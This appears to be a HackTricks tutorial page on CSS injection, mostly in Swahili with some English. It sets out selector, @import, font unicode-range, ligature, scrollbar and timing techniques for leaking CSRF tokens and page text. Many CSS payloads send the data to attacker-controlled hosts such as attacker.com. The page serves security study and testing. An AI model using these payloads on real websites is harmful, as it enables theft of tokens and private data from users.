CSS Injection

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

CSS Injection

Attribute Selector

CSS selectors zimeundwa ili kufanana na thamani za input kipengele cha name na value attributes. Ikiwa thamani ya kipengele cha input inaanza na herufi maalum, rasilimali ya nje iliyowekwa tayari inaloadiwa:

input[name=csrf][value^=a]{
background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf][value^=b]{
background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name=csrf][value^=9]{
background-image: url(https://attacker.com/exfil/9);
}

Hata hivyo, njia hii ina kikomo wakati wa kushughulikia vipengele vya input vilivyojificha (type="hidden") kwa sababu vipengele vilivyojificha havipakui mandharinyuma.

Kuepuka kwa Vipengele Vilivyojificha

Ili kuepuka kikomo hiki, unaweza kulenga kipengele cha ndugu kinachofuata kwa kutumia mchanganyiko wa ndugu wa jumla ~. Sheria ya CSS kisha inatumika kwa ndugu wote wanaofuatia kipengele cha input kilichojificha, na kusababisha picha ya mandharinyuma kupakuliwa:

input[name=csrf][value^=csrF] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}

A practical example of exploiting this technique is detailed in the provided code snippet. You can view it here.

Prerequisites for CSS Injection

For the CSS Injection technique to be effective, certain conditions must be met:

Payload Length: Upeo wa CSS injection lazima uunge mkono urefu wa kutosha wa payloads ili kuweza kubeba selectors zilizoundwa.
CSS Re-evaluation: Unapaswa kuwa na uwezo wa kuunda sura ya ukurasa, ambayo ni muhimu kuanzisha upya tathmini ya CSS na payloads mpya zilizoundwa.
External Resources: Mbinu hii inadhani uwezo wa kutumia picha zinazohifadhiwa nje. Hii inaweza kuwa na vizuizi na Sera ya Usalama wa Maudhui (CSP) ya tovuti.

Blind Attribute Selector

As explained in this post, it's possible to combine the selectors :has and :not to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection. It's also possible to use those selectors to extract information from several block of the same type like in:

<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
background:url(/m);
}
</style>
<input name=mytoken value=1337>
<input name=myname value=gareth>

Kuchanganya hii na mbinu ifuatayo ya @import, inawezekana kutoa taarifa nyingi kwa kutumia CSS injection kutoka kwa kurasa za kipofu na blind-css-exfiltration.

@import

Mbinu ya awali ina mapungufu, angalia mahitaji. Unahitaji kuwa na uwezo wa kutuma viungo vingi kwa mwathirika, au unahitaji kuwa na uwezo wa iframe kurasa zilizo hatarini za CSS injection.

Hata hivyo, kuna mbinu nyingine ya busara inayotumia CSS @import kuboresha ubora wa mbinu hiyo.

Hii ilionyeshwa kwanza na Pepe Vila na inafanya kazi kama ifuatavyo:

Badala ya kupakia ukurasa huo huo mara kwa mara na payload tofauti kumi kila wakati (kama ilivyo katika ile ya awali), tutakuwa tukipakia ukurasa mara moja tu na kwa kuagiza tu kwenye seva ya washambuliaji (hii ndiyo payload ya kutuma kwa mwathirika):

@import url('//attacker.com:5001/start?');

Uagizaji utaenda kupokea baadhi ya script za CSS kutoka kwa washambuliaji na kivinjari kitaipakia.
Sehemu ya kwanza ya script ya CSS ambayo mshambuliaji atatuma ni @import nyingine kwa seva ya washambuliaji tena.
Seva ya washambuliaji haitajibu ombi hili bado, kwani tunataka kuvuja baadhi ya herufi na kisha kujibu uagizaji huu na payload ili kuvuja zile nyingine.
Sehemu ya pili na kubwa zaidi ya payload itakuwa payload ya kuvuja chaguo la sifa
Hii itatuma kwa seva ya washambuliaji herufi ya kwanza ya siri na ya mwisho
Mara baada ya seva ya washambuliaji kupokea herufi ya kwanza na ya mwisho ya siri, itajibu uagizaji ulioombwa katika hatua ya 2.
Jibu litakuwa sawa kabisa na hatua za 2, 3 na 4, lakini wakati huu litajaribu kupata herufi ya pili ya siri na kisha ya kabla ya mwisho.

Mshambuliaji atafuatilia mzunguko huo hadi apate kabisa siri.

Unaweza kupata kanuni ya asili ya Pepe Vila ya kutumia hii hapa au unaweza kupata karibu kanuni sawa lakini iliyoelezewa hapa.

Script itajaribu kugundua herufi 2 kila wakati (kutoka mwanzo na kutoka mwisho) kwa sababu chaguo la sifa linaruhusu kufanya mambo kama:

/* value^=  to match the beggining of the value*/
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}

/* value$=  to match the ending of the value*/
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}

Hii inaruhusu script kuvuja siri haraka.

Wakati mwingine script haiwezi kugundua kwa usahihi kwamba prefix + suffix iliyogunduliwa tayari ni bendera kamili na itaendelea mbele (katika prefix) na nyuma (katika suffix) na wakati fulani itakwama. Usijali, angalia tu matokeo kwa sababu unaweza kuona bendera hapo.

Wateule wengine

Njia nyingine za kufikia sehemu za DOM kwa kutumia CSS selectors:

.class-to-search:nth-child(2): Hii itatafuta kipengee cha pili chenye darasa "class-to-search" katika DOM.
:empty selector: Inatumika kwa mfano katika hii andiko:

[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }

XS-Search inayotegemea makosa

Marejeo: CSS based Attack: Abusing unicode-range of @font-face , Error-Based XS-Search PoC by @terjanq

Nia kuu ni kutumia font maalum kutoka mwisho ulio na udhibiti na kuhakikisha kwamba maandishi (katika kesi hii, 'A') yanaonyeshwa kwa font hii tu ikiwa rasilimali iliyoainishwa (favicon.ico) haiwezi kupakuliwa.

<!DOCTYPE html>
<html>
<head>
<style>
@font-face{
font-family: poc;
src: url(http://attacker.com/?leak);
unicode-range:U+0041;
}

#poc0{
font-family: 'poc';
}

</style>
</head>
<body>

<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>

Matumizi ya Fonti Maalum:

Fonti maalum inafafanuliwa kwa kutumia sheria ya @font-face ndani ya tag <style> katika sehemu ya <head>.
Fonti inaitwa poc na inachukuliwa kutoka kwa kiungo cha nje (http://attacker.com/?leak).
Mali ya unicode-range imewekwa kuwa U+0041, ikilenga herufi maalum ya Unicode 'A'.

Element ya Kitu na Maandishi ya Kurejelea:

Element ya <object> yenye id="poc0" imeundwa katika sehemu ya <body>. Element hii inajaribu kupakia rasilimali kutoka http://192.168.0.1/favicon.ico.
Familia ya fonti kwa element hii imewekwa kuwa 'poc', kama ilivyoainishwa katika sehemu ya <style>.
Ikiwa rasilimali (favicon.ico) itashindwa kupakia, maudhui ya kurejelea (herufi 'A') ndani ya tag <object> yanaonyeshwa.
Maudhui ya kurejelea ('A') yataonyeshwa kwa kutumia fonti maalum poc ikiwa rasilimali ya nje haiwezi kupakiwa.

Kupamba Sehemu ya Scroll-to-Text

Pseudo-class :target inatumika kuchagua element inayolengwa na URL fragment, kama ilivyoainishwa katika CSS Selectors Level 4 specification. Ni muhimu kuelewa kwamba ::target-text haiwezi kulinganisha na element yoyote isipokuwa maandiko yalengwa waziwazi na fragment.

Kuna wasiwasi wa usalama unapojitokeza wakati washambuliaji wanatumia kipengele cha Scroll-to-text, wakiruhusu kuthibitisha uwepo wa maandiko maalum kwenye ukurasa wa wavuti kwa kupakia rasilimali kutoka kwa seva yao kupitia HTML injection. Njia hii inahusisha kuingiza sheria ya CSS kama hii:

:target::before { content : url(target.png) }

Katika hali kama hizi, ikiwa maandiko "Administrator" yapo kwenye ukurasa, rasilimali target.png inahitajiwa kutoka kwa seva, ikionyesha uwepo wa maandiko hayo. Mfano wa shambulio hili unaweza kutekelezwa kupitia URL iliyoundwa kwa njia maalum ambayo inaingiza CSS iliyowekwa pamoja na kipande cha Scroll-to-text:

http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator

Hapa, shambulio linatumia HTML injection kuhamasisha CSS code, likilenga maandiko maalum "Administrator" kupitia Scroll-to-text fragment (#:~:text=Administrator). Ikiwa maandiko yanapatikana, rasilimali iliyoonyeshwa inachukuliwa, bila kukusudia kuashiria uwepo wake kwa mshambuliaji.

Ili kupunguza, mambo yafuatayo yanapaswa kuzingatiwa:

Ulinganifu wa STTF ulio na mipaka: Scroll-to-text Fragment (STTF) imeundwa kulinganisha maneno au sentensi pekee, hivyo kupunguza uwezo wake wa kuvuja siri au token zisizo za kawaida.
Kikomo kwa Muktadha wa Kivinjari wa Juu: STTF inafanya kazi tu katika muktadha wa kivinjari wa juu na haifanyi kazi ndani ya iframes, hivyo kufanya jaribio lolote la unyakuzi kuwa rahisi kuonekana kwa mtumiaji.
Mahitaji ya Kuanzishwa na Mtumiaji: STTF inahitaji ishara ya kuanzishwa na mtumiaji ili kufanya kazi, ikimaanisha unyakuzi unaweza kufanyika tu kupitia navigations zilizoanzishwa na mtumiaji. Mahitaji haya yanapunguza hatari ya mashambulizi kufanywa kiotomatiki bila mwingiliano wa mtumiaji. Hata hivyo, mwandishi wa blogu anabainisha hali maalum na njia za kupita (k.m. uhandisi wa kijamii, mwingiliano na nyongeza maarufu za kivinjari) ambazo zinaweza kurahisisha kiotomatiki cha shambulio.

Uelewa wa mifumo hii na udhaifu wa uwezekano ni muhimu kwa kudumisha usalama wa wavuti na kulinda dhidi ya mbinu kama hizi za unyakuzi.

Kwa maelezo zaidi angalia ripoti asili: https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/

Unaweza kuangalia unyakuzi ukitumia mbinu hii kwa CTF hapa.

@font-face / unicode-range

Unaweza kubainisha fonti za nje kwa thamani maalum za unicode ambazo zitakusanywa tu ikiwa hizo thamani za unicode zipo kwenye ukurasa. Kwa mfano:

<style>
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range:U+0041;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range:U+0042;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range:U+0043;
}
#sensitive-information{
font-family:poc;
}
</style>

<p id="sensitive-information">AB</p>htm

When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".

Text node exfiltration (I): ligatures

Reference: Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację

The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps:

Creation of Custom Fonts:

SVG fonts are crafted with glyphs having a horiz-adv-x attribute, which sets a large width for a glyph representing a two-character sequence.
Example SVG glyph: <glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>, where "XY" denotes a two-character sequence.
These fonts are then converted to woff format using fontforge.

Detection of Width Changes:

CSS is used to ensure that text does not wrap (white-space: nowrap) and to customize the scrollbar style.
The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
The CSS involved:

body { white-space: nowrap };
body::-webkit-scrollbar { background: blue; }
body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }

Exploit Process:

Step 1: Fonts are created for pairs of characters with substantial width.
Step 2: A scrollbar-based trick is employed to detect when the large width glyph (ligature for a character pair) is rendered, indicating the presence of the character sequence.
Step 3: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character.
Step 4: Detection of the three-character ligature is carried out.
Step 5: The process repeats, progressively revealing the entire text.

Optimization:

The current initialization method using <meta refresh=... is not optimal.
A more efficient approach could involve the CSS @import trick, enhancing the exploit's performance.

Text node exfiltration (II): leaking the charset with a default font (not requiring external assets)

Reference: PoC using Comic Sans by @Cgvwzq & @Terjanq

This trick was released in this Slackers thread. The charset used in a text node can be leaked using the default fonts installed in the browser: no external -or custom- fonts are needed.

The concept revolves around utilizing an animation to incrementally expand a div's width, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections:

Prefix: The initial line.
Suffix: The subsequent line(s).

The transition stages of the characters would appear as follows:

C ADB

CA DB

CAD B

CADB

During this transition, the unicode-range trick is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. This scrollbar's appearance indirectly reveals the presence of a new character in the prefix.

Although this method allows the detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred.

Basically, the unicode-range is used to detect a char, but as we don't want to load an external font, we need to find another way. When the char is found, it's given the pre-installed Comic Sans font, which makes the char bigger and triggers a scroll bar which will leak the found char.

Check the code extracted from the PoC:

/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}

div.leak {
overflow-y: auto; /* leak channel */
overflow-x: hidden; /* remove false positives */
height: 40px; /* comic sans capitals exceed this height */
font-size: 0px; /* make suffix invisible */
letter-spacing: 0px; /* separation */
word-break: break-all; /* small width split words in lines */
font-family: rest; /* default */
background: grey; /* default */
width: 0px; /* initial value */
animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line{
font-size: 30px; /* prefix is visible in first line */
text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
0% { font-family: rest; } /* delay for width change */
5% { font-family: has_A, rest; --leak: url(?a); }
6% { font-family: rest; }
10% { font-family: has_B, rest; --leak: url(?b); }
11% { font-family: rest; }
15% { font-family: has_C, rest; --leak: url(?c); }
16% { font-family: rest }
20% { font-family: has_D, rest; --leak: url(?d); }
21% { font-family: rest; }
25% { font-family: has_E, rest; --leak: url(?e); }
26% { font-family: rest; }
30% { font-family: has_F, rest; --leak: url(?f); }
31% { font-family: rest; }
35% { font-family: has_G, rest; --leak: url(?g); }
36% { font-family: rest; }
40% { font-family: has_H, rest; --leak: url(?h); }
41% { font-family: rest }
45% { font-family: has_I, rest; --leak: url(?i); }
46% { font-family: rest; }
50% { font-family: has_J, rest; --leak: url(?j); }
51% { font-family: rest; }
55% { font-family: has_K, rest; --leak: url(?k); }
56% { font-family: rest; }
60% { font-family: has_L, rest; --leak: url(?l); }
61% { font-family: rest; }
65% { font-family: has_M, rest; --leak: url(?m); }
66% { font-family: rest; }
70% { font-family: has_N, rest; --leak: url(?n); }
71% { font-family: rest; }
75% { font-family: has_O, rest; --leak: url(?o); }
76% { font-family: rest; }
80% { font-family: has_P, rest; --leak: url(?p); }
81% { font-family: rest; }
85% { font-family: has_Q, rest; --leak: url(?q); }
86% { font-family: rest; }
90% { font-family: has_R, rest; --leak: url(?r); }
91% { font-family: rest; }
95% { font-family: has_S, rest; --leak: url(?s); }
96% { font-family: rest; }
}

/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
0% { width: 0px }
1% { width: 20px }
2% { width: 40px }
3% { width: 60px }
4% { width: 80px }
4% { width: 100px }
5% { width: 120px }
6% { width: 140px }
7% { width: 0px }
}

div::-webkit-scrollbar {
background: blue;
}

/* side-channel */
div::-webkit-scrollbar:vertical {
background: blue var(--leak);
}

Text node exfiltration (III): kuvuja charset na fonti ya default kwa kuficha vipengele (visivyohitaji mali za nje)

Reference: Hii inatajwa kama suluhisho lisilofanikiwa katika andiko hili

Kesi hii ni sawa na ile ya awali, hata hivyo, katika kesi hii lengo la kufanya chars fulani kuwa kubwa kuliko zingine ni kuficha kitu kama kitufe kisichopaswa kubonyezwa na bot au picha ambayo haitapakiwa. Hivyo tunaweza kupima kitendo (au ukosefu wa kitendo) na kujua kama char fulani ipo ndani ya maandiko.

Text node exfiltration (III): kuvuja charset kwa muda wa cache (visivyohitaji mali za nje)

Reference: Hii inatajwa kama suluhisho lisilofanikiwa katika andiko hili

Katika kesi hii, tunaweza kujaribu kuvuja kama char ipo katika maandiko kwa kupakia fonti ya uwongo kutoka chanzo kimoja:

@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
}

Ikiwa kuna mechi, font itapakiwa kutoka /static/bootstrap.min.css?q=1. Ingawa haitapakia kwa mafanikio, ** kivinjari kinapaswa kukiweka**, na hata kama hakuna cache, kuna mekanism ya 304 not modified, hivyo jibu linapaswa kuwa haraka kuliko mambo mengine.

Hata hivyo, ikiwa tofauti ya muda ya jibu lililohifadhiwa kutoka kwa lile lisilohifadhiwa si kubwa vya kutosha, hii haitakuwa na manufaa. Kwa mfano, mwandishi alitaja: Hata hivyo, baada ya kupima, niligundua kuwa tatizo la kwanza ni kwamba kasi si tofauti sana, na tatizo la pili ni kwamba bot inatumia lippu ya disk-cache-size=1, ambayo ni ya kufikiria sana.

Uhamasishaji wa nodi ya maandiko (III): kuvuja charset kwa kupima kupakia fonts za ndani "mifano" (zinazohitaji mali za nje)

Marejeleo: Hii inatajwa kama suluhisho lisilofanikiwa katika andiko hili

Katika kesi hii unaweza kuonyesha CSS kupakia mamia ya fonts za uongo kutoka chanzo kimoja wakati mechi inatokea. Kwa njia hii unaweza kupima muda inachukua na kugundua ikiwa herufi inaonekana au la kwa kitu kama:

@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1),
url(/static/bootstrap.min.css?q=2),
....
url(/static/bootstrap.min.css?q=500);
unicode-range: U+0041;
}

Na msimbo wa bot unaonekana kama hii:

browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)

Hivyo, ikiwa fonti haifananishi, muda wa majibu unapofika kwenye bot unatarajiwa kuwa takriban sekunde 30. Hata hivyo, ikiwa kuna ulinganifu wa fonti, maombi mengi yatatumwa ili kupata fonti, na kusababisha mtandao kuwa na shughuli zisizo na kikomo. Kama matokeo, itachukua muda mrefu kutimiza hali ya kusitisha na kupokea majibu. Kwa hivyo, muda wa majibu unaweza kutumika kama kiashiria kubaini ikiwa kuna ulinganifu wa fonti.

Marejeleo

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousJavaScript Execution XS Leak NextCSS Injection Code

Last updated 4 days ago